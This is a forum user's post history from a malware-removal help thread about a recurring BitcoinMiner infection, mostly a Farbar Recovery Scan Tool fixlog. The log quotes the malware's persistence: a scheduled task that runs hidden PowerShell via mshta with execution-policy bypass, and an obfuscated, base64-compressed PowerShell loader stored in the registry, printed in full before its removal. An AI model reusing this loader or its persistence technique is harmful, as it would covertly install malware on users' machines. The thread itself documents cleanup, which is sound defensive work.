_maros_
Members-
Posts
6 -
Joined
-
Last visited
Content Type
Events
Profiles
Forums
Everything posted by _maros_
-
BitcoinMiner virus - keeps reapearing in windows folder
_maros_ replied to _maros_'s topic in Resolved Malware Removal Logs
It works smoothly,no known implications. There was nothing else, but this miner. Thank you very much for your help, it is much appreciated. -
BitcoinMiner virus - keeps reapearing in windows folder
_maros_ replied to _maros_'s topic in Resolved Malware Removal Logs
Great! Here you are, sir. I hope everything´s clean. Addition.txt FRST.txt -
BitcoinMiner virus - keeps reapearing in windows folder
_maros_ replied to _maros_'s topic in Resolved Malware Removal Logs
No, there´s nothing. I even checked it myself before the test and there were no such files. I assume it´s deleted. Thank you very much, Aura. -
BitcoinMiner virus - keeps reapearing in windows folder
_maros_ replied to _maros_'s topic in Resolved Malware Removal Logs
Of course I can. Here you are. Quarantine.rar -
BitcoinMiner virus - keeps reapearing in windows folder
_maros_ replied to _maros_'s topic in Resolved Malware Removal Logs
Here it is: Fix result of Farbar Recovery Scan Tool (x64) Version: 02.08.2018 Ran by Maros (17-08-2018 04:49:16) Run:1 Running from C:\Users\Maros\Desktop Loaded Profiles: Maros (Available Profiles: Maros) Boot Mode: Normal ============================================== fixlist content: ***************** CloseProcesses: CreateRestorePoint: VirusTotal: C:\Windows\SearchIndexer.exe REG: REG QUERY "HKLM\Software\WOW6432Node\a" /s DeleteKey: "HKLM\Software\WOW6432Node\a" HKLM-x32\...\Run: [] => [X] HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION R2 Windows Indexer; C:\Windows\SearchIndexer.exe [175104 2017-07-21] () [File not signed] S3 catchme; \??\C:\ComboFix\catchme.sys [X] ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File Task: {3F899011-3DFF-41B4-8C6E-2E23C3219D01} - System32\Tasks\SystemSettings => mshta vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -WindowStyle hidden -ep bypass -nop -c $e=(Get-ItemProperty HKLM:\Software\WOW6432Node\a);Select-Object -ExpandProperty Shell;Invoke-Expression $e",0,True)(window.close) Task: {74574B7F-D990-45FD-92A8-29D7DEF47A4B} - System32\Tasks\{F0F3D472-5E35-4B0C-9D3C-A69FE3F8FBD4} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxps://www.skype.com/go/downloading?source=lightinstaller&ver=7.33.0.105&LastError=-9 Task: {EB7F2515-2353-4092-BAD8-ED5393FA11F3} - System32\Tasks\{CE0AD542-538F-4623-AEA5-63EEEE4AF113} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxps://ui.skype.com/ui/0/7.33.0.105/sk/abandoninstall?source=lightinstaller&page=tsInstall AlternateDataStreams: C:\ProgramData:NT2 [432] AlternateDataStreams: C:\Users\All Users:NT2 [432] AlternateDataStreams: C:\ProgramData\Application Data:NT2 [432] AlternateDataStreams: C:\ProgramData\Data aplikací:NT2 [432] AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [432] AlternateDataStreams: C:\Users\Maros\AppData\Roaming:NT [40] AlternateDataStreams: C:\Users\Maros\AppData\Roaming:NT2 [432] FirewallRules: [{A0658A65-BC19-435B-A6AF-DC175E006F99}] => (Allow) C:\Windows\SysWOW64\msiexec.exe FirewallRules: [{3EE7CA85-7C7D-4B12-AEE2-F2242A121EA6}] => (Allow) C:\Windows\SysWOW64\msiexec.exe C:\Windows\IEcache.exe C:\Windows\IE.exe C:\Windows\SearchIndexer.exe EmptyTemp: ***************** Processes closed successfully. Restore point was successfully created. VirusTotal: C:\Windows\SearchIndexer.exe => https://www.virustotal.com/file/acff01bde041c78aff3010ee98c2d108d4def08684131850cfec9b16daa818c7/analysis/1532948184/ ========= REG QUERY "HKLM\Software\WOW6432Node\a" /s ========= HKEY_LOCAL_MACHINE\Software\WOW6432Node\a Shell REG_SZ (nEW-oBjEct sySTeM.iO.comPrEsSIoN.dEFlATeStREAm([sySteM.Io.memorYStReAm][sYStem.CoNveRT]::fRombASE64sTRiNg('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' ) , [SySTEM.iO.COMPrESSiON.cOmPresSioNMoDE]::decOmPrESS )|% { nEW-oBjEct SYstem.IO.STREaMReaDEr($_,[teXt.EnCOdiNg]::AsCii)}|% {$_.REadtoEnD()})|.((geT-vARiaBLE '*MDR*').name[3,11,2]-JoIN'') ========= End of Reg: ========= "HKLM\Software\WOW6432Node\a" => removed successfully "HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => removed successfully "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => removed successfully "HKLM\System\CurrentControlSet\Services\Windows Indexer" => removed successfully Windows Indexer => service removed successfully "HKLM\System\CurrentControlSet\Services\catchme" => removed successfully catchme => service removed successfully "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast" => removed successfully HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => not found "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{3F899011-3DFF-41B4-8C6E-2E23C3219D01}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3F899011-3DFF-41B4-8C6E-2E23C3219D01}" => removed successfully C:\Windows\System32\Tasks\SystemSettings => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemSettings" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{74574B7F-D990-45FD-92A8-29D7DEF47A4B}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{74574B7F-D990-45FD-92A8-29D7DEF47A4B}" => removed successfully C:\Windows\System32\Tasks\{F0F3D472-5E35-4B0C-9D3C-A69FE3F8FBD4} => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F0F3D472-5E35-4B0C-9D3C-A69FE3F8FBD4}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EB7F2515-2353-4092-BAD8-ED5393FA11F3}" => removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EB7F2515-2353-4092-BAD8-ED5393FA11F3}" => removed successfully C:\Windows\System32\Tasks\{CE0AD542-538F-4623-AEA5-63EEEE4AF113} => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{CE0AD542-538F-4623-AEA5-63EEEE4AF113}" => removed successfully C:\ProgramData => ":NT2" ADS removed successfully "C:\Users\All Users" => ":NT2" ADS not found. "C:\ProgramData\Application Data" => ":NT2" ADS not found. "C:\ProgramData\Data aplikací" => ":NT2" ADS not found. C:\ProgramData\MTA San Andreas All => ":NT2" ADS removed successfully C:\Users\Maros\AppData\Roaming => ":NT" ADS removed successfully C:\Users\Maros\AppData\Roaming => ":NT2" ADS removed successfully "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{A0658A65-BC19-435B-A6AF-DC175E006F99}" => removed successfully "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3EE7CA85-7C7D-4B12-AEE2-F2242A121EA6}" => removed successfully Could not move "C:\Windows\IEcache.exe" => Scheduled to move on reboot. C:\Windows\IE.exe => moved successfully C:\Windows\SearchIndexer.exe => moved successfully =========== EmptyTemp: ========== BITS transfer queue => 0 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 18224314 B Java, Flash, Steam htmlcache => 0 B Windows/system/drivers => 36126 B Edge => 0 B Chrome => 224264191 B Firefox => 55079034 B Opera => 0 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 33058 B Public => 0 B ProgramData => 0 B systemprofile => 33058 B systemprofile32 => 33490 B LocalService => 132244 B NetworkService => 55931862 B Maros => 830138 B UpdatusUser => 0 B UpdatusUser => 0 B UpdatusUser => 0 B UpdatusUser => 0 B docasny => 46497 B RecycleBin => 0 B EmptyTemp: => 338.2 MB temporary data Removed. ================================ Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 17-08-2018 04:55:10) C:\Windows\IEcache.exe => Is moved successfully ==== End of Fixlog 04:55:11 ==== -
Hello, I have a problem with BitcoinMiner virus as detected by MBAM in my windows folder. I´ve already tried to delete it, but it keeps reapearing after each next reboot. I´ve read several threads here with the same problem, though no file had the same name. Also MSE keeps moving it to quarantine after start up automatically. However, after the first scan with MBAM, it detected a few more files which are gone now. Every try to delete it is to no avail as it is somehow downloading repeatedly. The files are IE.exe and IEcache.exe in windows folder. I enclose MBAM log as well as FRST logs. Thank a lot in advance, dear professionals. mbam-scan.txt Addition.txt FRST.txt